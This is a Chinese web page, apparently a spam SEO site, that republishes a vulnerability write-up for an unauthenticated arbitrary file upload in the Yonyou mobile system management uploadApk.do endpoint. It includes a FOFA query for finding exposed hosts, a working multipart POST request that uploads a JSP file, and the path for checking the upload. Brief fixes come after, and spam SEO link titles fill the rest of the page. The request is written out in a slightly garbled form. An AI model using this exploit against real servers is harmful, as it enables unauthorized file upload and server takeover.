当前位置: 首页 > news >正文

官方网站侵权免费网站服务器

官方网站侵权,免费网站服务器,站长之家域名ip查询,加强整改政府网站建设的措施0x01 产品简介 用友移动系统管理是用友公司推出的一款移动办公解决方案,旨在帮助企业实现移动办公、提高管理效率和员工工作灵活性。它提供了一系列功能和工具,方便用户在移动设备上管理和处理企业的系统和业务。 0x02 漏洞概述 用友移动管理系统 uploa…

0x01 产品简介

   用友移动系统管理是用友公司推出的一款移动办公解决方案,旨在帮助企业实现移动办公、提高管理效率和员工工作灵活性。它提供了一系列功能和工具,方便用户在移动设备上管理和处理企业的系统和业务。

0x02 漏洞概述

  用友移动管理系统 uploadApk.do 接口存在任意文件上传漏洞,未经授权攻击者通过漏洞上传任意文件,最终可以获取服务器权限。

0x03 复现环境

FOFA:app="用友-移动系统管理"

0x04 漏洞复现

PoC

POST /maportal/appmanager/uploadApk.do?pk_obj= HTTP/1.1
Host: your-ip
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvLTG6zlX0gZ8LzO3------WebKitFormBoundaryvLTG6zlX0gZ8LzO3
Content-Disposition: form-data; name="downloadpath"; filename="a.jsp"
Content-Type: application/mswordhello
------WebKitFormBoundaryvLTG6zlX0gZ8LzO3--

 PS:返还状态码必须是2,其他状态码不行

验证url

http://your-ip/maupload/apk/a.jsp

0x05 修复建议

 关闭互联网暴露面或设置接口访问权限

 升级至安全版本

http://www.zhongyajixie.com/news/7377.html

相关文章:

  • 网站关键词优化快速排名长沙百度搜索网站排名
  • 一般通过爷seo网站排名优化公司哪家好
  • 网站背景磨砂灰背景怎么做市场营销方案范文
  • 网站登录界面用什么软件做百度在线客服人工服务
  • wordpress 分享 微信整站优化
  • 培训app的制作seo日常工作
  • 机械加工怎样网上接单厦门网站快速排名优化
  • 江苏省住房建设厅网站太原网站关键词推广
  • 日本网页设计网站合肥网站推广优化公司
  • wordpress设置支付宝端点seo博客
  • 个人网站建设软件品牌推广文案
  • 游戏网站做的思想步骤怎么制作网页推广
  • 网站的维护和推广seo优化工具
  • 建立一个企业网站自媒体运营主要做什么
  • 广州哪里有做公司网站 什么价seo研究中心怎么样
  • 中山手机网站建设哪家好广州优化seo
  • 做网站为什么需要购买域名东莞网站seo优化
  • 龙口有没有做网站的关键词优化报价查询
  • 十大开源软件苏州seo关键词优化价格
  • 昆山新意建设咨询有限公司网站做一个网站要花多少钱
  • 如何把旅行社网站做的好看如何创建公司网站
  • 网站计划任务怎么做推广方案策略怎么写
  • 四川省城乡住房建设部网站中国seo排行榜
  • b2b网站大全 网址大全广州百度推广客服电话
  • 怎么在公众号做影视网站谷歌优化教程
  • 曾经做博彩网站代理百度推广app下载官方
  • 浙江建设职业技术学院oa网站百度联系方式
  • 网站移动端和PC端自适应怎么做google搜索
  • 专业做国际网站平台营销
  • 织梦做的网站打开慢百度接单平台